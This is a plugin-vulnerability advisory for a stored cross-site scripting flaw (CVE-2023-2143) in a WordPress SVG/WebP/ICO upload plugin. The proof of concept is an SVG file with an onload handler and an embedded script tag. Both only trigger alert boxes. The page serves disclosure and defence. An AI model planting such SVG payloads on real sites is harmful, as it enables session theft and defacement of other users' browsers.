Enable SVG, WebP & ICO Upload < 1.1.1 – Author+ Stored XSS | CVE 2023-2143 | Plugin Vulnerabilities

Description

The plugin does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.

Proof of Concept

1. Upload an SVG file with the following contents.
2. View the SVG file on the frontend and see the alerts.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   onload="javascript:alert(/XSS/)"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   id="svg3013"
   sodipodi:docname="download_font_awesome.svg">
<script>alert(/XSS2/)</script>
</svg>

Affects Plugins

enable-svg-webp-ico-upload

Fixed in 1.1.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Mateus Machado Tesser

Submitter

Mateus Machado Tesser

Verified

Yes

WPVDB ID

91898762-aa7d-4fbc-a016-3de48901e5de

Timeline

Publicly Published

2023-06-23 (about 2 years ago)

Added

2023-06-23 (about 2 years ago)

Last Updated

2024-11-29 (about 1 year ago)

Other

Published

Title

Published

2024-01-31

Title

Chartify < 2.0.7 - Authenticated(Administrator+) Stored Cross-Site Scripting

Published

2020-06-19

Title

Travel Booking < 2.8.2 - Unauthenticated Reflected XSS

Published

2025-10-10

Title

Next Page, Not Next Post <= 0.3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-10-31

Title

Bonway Static Block Editor <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-08-28

Title

Beaver Builder (Lite Version) < 2.8.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via type Parameter